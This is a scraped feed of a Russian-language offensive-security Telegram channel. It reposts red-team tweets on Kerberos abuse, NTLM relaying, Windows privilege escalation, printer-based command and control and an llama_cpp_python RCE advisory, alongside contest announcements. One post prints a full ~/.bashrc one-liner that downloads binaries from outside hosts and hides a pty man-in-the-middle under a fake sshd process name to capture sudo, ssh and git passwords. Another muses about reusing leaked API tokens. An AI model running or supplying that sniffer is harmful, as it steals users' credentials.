Offensive Xwitter – Telegram
Offensive Xwitter
19.4K subscribers
908 photos
48 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
Download Telegram
Forwarded from true_security
эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
👍10
Как относитесь к рекламам на канале?
Anonymous Poll
65%
Жить можно, все равно автор сас 🥰
35%
Резко негативно, атписка 🤬
👍1🥱1
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/noscript" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'


🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥15😢1
😈 [ Rasta Mouse @_RastaMouse ]

[BLOG]
I integrated some Rust artifacts directly into CS 😱

Here's the blog post demonstrating how you can make your own.

🔗 https://rastamouse.me/custom-beacon-artifacts/

🐥 [ tweet ][ quote ]
🔥6👍1🥱1
⚡️Конкурс!⚡️

Наши друзья из Positive Technologies предоставили нам 6 проходок на PhD для проведения благотворительного конкурса. Читаем инфу ниже!

📎 Описание конкурса:
Вы пишете обезличенный отчет, в котором рассказываете о своей самой интересной баге, отправляете отчет в бота. Позже команда жюри оценит его, а уже 17 мая мы свяжемся с участниками и отдадим их заслуженные призы).

🏅 Призы:
Жюри выберет топ 6 участников для полноценной или частичной компенсации билетов на PositiveHackDays и обратно!

🔖 Как мне участвовать?
1. Являться школьником/студентом бакалавриата или специалитета
2. Отправить файл формата .docx или .pdf с описанием бага в нашего бота (В описании к файлу должно содежаться слово Заявка)

Время проведения:
6го мая в 15:00 - Старт приема заявок
13 мая 15:00 - Закрытие приема заявок
17 мая 17:00 Оглашение результатов

📝 Критерии оценивания:
1. Подробность описания (3 балла)
2. Сложность эксплуатации (2 балла)
3. Нестандартный подход и креативность (3 балла)
4. Вау-эффект (субъективный параметр на усмотрение членов жюри) (2 балла)

👀 Состав жюри:
@SidneyJob (Пентестер, автор канала Заметочки SidneyJob)
@curiv (Пентестер, активист ИБ сообщества, основатель @dc7342, @permctf, автор канала @pathsecure)
@cyrus_0x00 (Пентестер в компании DeteAct )
@brotherok (Багхантер, автора канала ШКИБыть)
@bughunter_circuit (Автор канала о багхантинге)
@romanpnn (Автор канала Пакет Безопасности)
@wr3dmast3r (Пентестер, автор канала wr3dmast3r vs pentest)
@r00t_owl (Директор департамента противодействия киберугрозам, автор канала PRO:PENTEST)
<конечный список жюри уточняется>

💰Бюджет:
Бюджет на оплату дороги для всех участников - 120 тысяч. Мы тратим весь планируемый бюджет, в том числе, в счет компенсации оплаты дороги другим победителям.

📃 Что будет с отчетами?
Планируется опубликовать отчеты победителей (при согласии автора)

👉 Важная деталь: Жюри и бюджет формируется независимыми инициативными участниками русскоязычного ИБ сообщества. Конкурс следует воспринимать как благотворительность в отношении перспективных молодых талантов. Мы убеждены, что за такими специалистами находится будущее ИБ сообщества.

💬 По всем вопросам писать сюда: @SidneyJob, @CuriV
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🥱2🔥1
😈 [ Synacktiv @Synacktiv ]

In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.

🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection

🐥 [ tweet ]
🔥6🤔1
😈 [ Oddvar Moe @Oddvarmoe ]

Created a noscript using ADExplorersnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++

🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43

Decided to go with || as a separator on the out files. Should be easy to parse with cut -d "|"

🐥 [ tweet ]
👍7
😈 [ Grzegorz Tworek @0gtweet ]

Making my computer unhackable after realizing "Security questions" are actually UTF-16LE JSON stored as ResetData REG_BINARY in HKLM\SAM\SAM\Domains\Account\Users\...

🐥 [ tweet ]
👍13🤔3😁2
😈 [ Daniel @0x64616e ]

How to WebDAV Relay LPE on Windows 11:
1-3. Trigger start of EFS service trough Explorer
4-11. Continue like on Windows 10
Thanks again @ret2src for the idea.

Any tip for triggering EFS remotely on Windows 11 would be greatly appreciated by the way :D

🐥 [ tweet ]
🔥6👍4
В отпуске зашел спокойно поиграть в компуктер, но, будучи шизом, не справился и в итоге играл не в игрульку, а с Cheat Engine, ведь гейм-читеры круче редтимеров. Спойлер: эта заметка не для чит-мейкеров, а для людей, которые первый раз открыли Cheat Engine и наугад тыкают кнопки в его интерфейсе (таких, как я):

🔗 https://snovvcrash.rocks/2024/05/10/newbies-game-hacking-notes.html
👍8🔥5😁4🥱3
😈 [ Rasta Mouse @_RastaMouse ]

[BLOG]
I built a .NET web app to help test and analyse Kerberos delegation configurations.

🔗 https://rastamouse.me/kerberos-delegation-test-app/

🐥 [ tweet ]
👍3
😈 [ Matt Creel @Tw1sm ]

Was inspired by @vendetce to dig into Kerberos TGT renewal with Impacket this morning. Short example noscript in a PR here to do just that ⤵️

🔗 https://github.com/fortra/impacket/pull/1744

🐥 [ tweet ]
🔥3
Теперь я понимаю, почему Маска так хейтят за реформы в Твиттере на X - 100$ и 5000$ в месяц за Basic и Pro подписки соответственно на Twitter API v2 это просто абсурд (на бесплатном тарифе, если что, можно только постить твиты и смотреть информацию о собственном профиле). Скажем, если бы автор некоего сферического бота в тг, завязанного на Твиттер апи, уже давно использовал ликнутые на GH токены, то при аннулировании очередного из них новый искать стало бы все более и более проблематично, потому что люди начинают следить более ответственно за подпиской ценой в 💯 бачей.

К счастью, функциональность API для получения информации в красивом json-е о том или ином твите на удивление легко эмулируется средствами веб-тестировки, например, с помощью playwright 😉
🔥6😁4👍2🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ pfiatde @pfiatde ]

As ntlm leaking is still a thing, made a showcase for elevating via ldap relaying with some little tricks.

Relaying is done with a Win Client without admin privs and an active Windows firewall (default config), by using HTTP.SYS and SSH.
Details here:

🔗 https://badoption.eu/blog/2024/04/25/netntlm.html

🐥 [ tweet ]
👍2🔥2
Ежегодная независимая премия для пентестеров — Pentest award возвращается!

Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.

В этот раз вас ждут 6 номинаций, по три призовых места в каждой:

— Пробив WEB 🆕
— Пробив инфраструктуры 🆕
— Девайс 🆕
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка

Главный приз — тяжеленная стеклянная именная статуэтка за первое место (у меня вот такая уже имеется). Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.

Я в этом году участвовать не планировал, а всем остальным пожелаю удачи!

Сбор заявок уже открыт на сайте:
🔗 https://award.awillix.ru/

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍4🥱3
😈 [ LLM Security @llm_sec ]

Remote Code Execution by Server-Side Template Injection in Model Metadata

CVSS 9.7 in llama_cpp_python

found by @retr0reg

🔗 https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829

🐥 [ tweet ]
🔥3👍1
😈 [ Nicolas Krassas @Dinosn ]

PoC for using MS Windows printers for persistence / command and control via Internet Printing

🔗 https://github.com/Diverto/IPPrintC2

🐥 [ tweet ]
🔥6👍2
😈 [ CravateRouge @rouge_cravate ]

Performing kerberos cross domain authentication with impacket is not straightforward!
If you want to authenticate on domain A (trusting domain B) with a userB you must ask a ST to domain B for krbtgt/domainA and then use this ST to request new ST to domainA, e.g.:

🐥 [ tweet ]

Б for Баян
🔥5
😈 [ sinusoid @the_bit_diddler ]

I'm intending to release an open-source Visual Studio Code extension to make writing BOFs easier for the community:

- Complete Nt/Zw function prototypes with tab completion (and correct typecasting for placeholder variables)
- MSDN header searching

PoC:

🔗 https://www.youtube.com/watch?v=oWss4Ac9Pl8

🐥 [ tweet ]
🔥3